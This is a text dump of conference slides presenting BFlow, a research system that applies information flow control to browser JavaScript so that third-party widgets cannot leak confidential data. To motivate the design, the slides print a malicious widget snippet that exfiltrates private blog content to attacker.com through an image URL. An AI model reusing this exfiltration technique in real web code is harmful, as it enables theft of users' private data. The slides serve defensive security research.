Privacy-Preserving Browser-Side Scripting With BFlow

Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris

Massachusetts Institute of Technology

Web Sites Support 3rd Party JavaScript Extensions

Snippets of the last few blog posts

Display the last few reader comments

• Blogger.com supports “widgets”– read and modify blog posts

Confidential Blogs Are Vulnerable to 3rd Party JavaScript

v

A 3rd Party JavaScript Leak Attack

private_data = document.getElementById(“posts”);widget.innerHTML = private_data; widget.innerHTML += ‘<IMG SRC=http://attacker.com/’+ private_data +‘.gif>’;

Widget’s JavaScript source code:

HTTP Request: GET /sell_pet_food_online.gif HTTP/1.0

attacker.com ServerAlice’s Browser

Blogger JS+

Attacker JS

Widget has access to private blog content

Widget leaks private blog content to attacker.com

• Blogger.com wants to provide data to widgets• Browser security policy permits JS to send data freely• Wrote a malicious blogger.com widget in one hour

Shows private blog content in widget’s box

Zlxcoizvuowqjlsavzmzlvcjlsadfjfoqwojerl,clvzlxcvjaoisjqklqwerljdsalzzx,vcnadsoqoiewqoirulnzdlkfjaoiqueoqejlnlvkjxzcoivuaqoeruqowejrlkasdnzcvzxvalsdfouqoweurozxcvjlkajoqewjrlsdznlkzxvjzl

lkjljvojubjjcjif

oitotouroiejfjlf

Check Spelling!

Dan’s Spell Checker

Problem: Extensibility vs. Privacy

Encrypt Mail

Decrypt Mail

Joe’s EncryptionWidget

(Choose one)

• Either choose cool extensibility features– e.g. Blogger.com widgets

• Or choose privacy and no 3rd party code – e.g. Gmail

Solution: BFlow

• Eliminate the choice between features & privacy• Add information flow control (IFC)– To JavaScript in the browser– Track private data inside the browser and server

• Prohibit communication that leaks private data

Challenges• Fit JavaScript environment into an IFC model– Preserve JavaScript communication channels

Send to top-level frame

Send to sub-

frame

Google Maps Server

Private address

• Fit JavaScript environment into an IFC model– Preserve JavaScript communication channels– Mashups with private data

• Fit JavaScript environment into an IFC model– Preserve JavaScript communication channels– Mashups with private data

• Easy to adopt– Minimize changes to JS that uses existing communication

channels– Minimize changes required on the server– Easy for end-users to start using

Contributions

• An IFC model for the JS runtime environment• Easy to deploy and adopt implementation– Installs in browser with 2 clicks– Requires no changes to JavaScript interpreter• Only small changes to JavaScript communication API

• A platform that supports real blogger.com widgets

BFlow Overview

Browser Reference Monitor

Trusted Protection Zone Untrusted Protection Zones

Blog Web Server

attacker.com ServerLabel: Saw Alice’s private data

Reference Monitor knows

when a zone reads private

data

Label: Saw Alice’s private data

Blog Server Supplies Some

HTML/JSBlog Server “labels” private

data with a “tag”

3rd Party Supplies Widget

HTML/JS

BFlow Overview

Browser Reference Monitor

Blog Web Server

attacker.com Server

Declassification: Fetch Map Image

from Google Maps, OK!

Google Maps Server

BFlow prevents the malicious widget from

leaking private data

Have not seen private data: Can send

requests to any server

Have seen private data: Can only send requests

to the data’s server

Design Outline

• Tags and Labels• Protection Zones• Reference Monitor• Server

Tags And Labels• A label is a set of tags– Describes what private data an object contains– Each zone, HTTP request, and response has a label

• Each tag identifies a kind of private data– Alice’s tag: blogger.com:alice– Bob’s tag: blogger.com:bob

• e.g. Alice’s blog has label L={blogger.com:alice}

• A label is a set of tags– Describes what private data an object contains– Each zone, HTTP request, and response has a label

Data Flow Rule

• Data may flow only if Ldata Lreceiver

Data Label Receiver Label May Receive{x} {x,y} Yes{x} {} No

DataData Receiver JavaScript

?

Protection Zones• A zone is a group of browser HTML <frames>– Regular JavaScript runs inside a frame inside a zone– All frames in a zone share the same label

• Trusted zone– Top-level frame is in the site’s trusted zone– Contains JavaScript written only by the site’s developers– Need not abide by information flow restrictions

• Untrusted zones– Contain 3rd party JavaScript– Must abide by information flow restrictions

Example Zones & Labels

Zone AL={}

Zone BL={blogger.com:alice}

Trusted Zone(No Label)

Zone CL={}

Zone D L={blogger.com:alice}

How Do Untrusted Zones Get Labels?

L={}L={blogger.com:alice}

Blog Web Server

Browser Reference Monitor

Trusted zone sets untrusted zone’s label

augment_label (blogger.com:alice)

Works With Existing JS Channels• Channel 1: A frame can always send to its child frame– Lparent Lchild

Frame 2L={X.com:A,

X.com:B}

Web PageShowing Inherent JavaScript Channels

Frame 1L={X.com:A}

Top-level Frame from X.com

Frame 1 may not add X.com:C to its label

No sub-frame from X.com may add a tag from Y.com

• Channel 2: A frame can always send to the top-level frame– To avoid leaking data, untrusted zones may contain only tags from

the web site in the top-level frame

• Channel 1: A frame can always send to its child frame– Lparent Lchild

Why Zones Instead Of Frames?• Some JavaScript consists of multiple frames• Group JavaScript into modules by label

– All frames in the same zone can always communicate– Trusted JavaScript sets the label of a multi-frame widget only once– Existing multi-frame widgets need not coordinate label changes

e.g. Cbox chat widget

Bottom frame writes messages to top frame

BFlow‘s JavaScript Model• All JavaScript will work if the IFC rules allow– AJAX, eval()

• The IFC rule (Ldata Lreceiver) affects– access to DOM variables & cookies– postMessage(), fragment-ID messages– HTTP requests and responses

HTTP Request Rules

• Trusted zone T– can send to any server (always)– can receive a response from any server (always)

• Untrusted zone Z– can send to the server where secret data came from (always)

• can receive the response (when Lresponse LZ)

– can send to 3rd party server E (when LZ = {}) • or web site has a declassification exception for (server E, URL)• can receive the response (always)

The BFlow Server API• Propagate label from HTTP requests to responses– Read label contained in each request– Attach the label to any response that uses labeled data

Blog Web Server

HTTP Response Contents: sell_petfood_onlineLabel: L = {blogger.com:alice}

L={blogger.com:alice}

Zone AL={blogger.com:alice}

L={blogger.com:alice}

HTTP Request:POST save_post?content=sell_petfood_onlineLabel: L = {blogger.com:alice}

Zone BL={blogger.com:alice}

BFlow Implementation

Browser Reference Monitor

Firefox Extension1100 Lines of code

Users can install with 2 clicks

JavaScript communication API

changed slightly

No changes to JavaScript interpreter

Zone Isolation

Domain name:Zone2.blogger

Domain name:Zone1.blogger

• Repurpose browser’s same-origin policy (SOP)– Zones communicate via reference monitor

No direct communication

• Repurpose browser’s same-origin policy (SOP)– Zones communicate via reference monitor– SOP is conservative: no DOM read/write across zones

even if labels would allow

Applications

• BF-Socialnet– Social network that supports 3rd party JS extensions– Protects private user data (see paper)

• BFlogger– Blog mockup that supports blogger.com widgets– Ported 12 existing widgets to BFlogger

BFlow Preserves Privacy

• Wrote a malicious Blogger.com widget– Successfully leaks data from confidential blogs

• Ported widget to BFlogger– BFlow prevents malicious widget from leaking data

attacker.com Server

No requests to attacker.com after

reading private data

BFlow Runs Existing JavaScript

Widget Lines of Code

Lines Changed

Uses Secret Data?

Twitter 25 0 No

Flickr 10 0 No

Buzz 1 0 No

Youtube 1982 0 No

Calendar 1945 0 No

Weather 3790 0 No

Popular Posts 16 1 Yes

Commenters 15 1 Yes

Recent Posts 74 2 Yes

Random Post 34 2 Yes

Cbox-chat 801 89 Yes

High because we made Chat store data on the BFlow server to protect chat data

• Better privacy with little or no changes

Existing Research

• Can’t grant read access without also leaking [MashupOS]• Requires rewriting JavaScript & manual jail config [Caja]• Don’t support untrusted JavaScript [Swift, SIF]• User must make disclosure decisions [NoMoXSS]• Certificates [Java]

Conclusion• 3rd party JavaScript can leak confidential user data• BFlow provides a new web security model– Tracks information flow between client & server– 3rd party JavaScript can safely compute and display– Enables new features in web sites• e.g. 3rd party Gmail extensions

Questions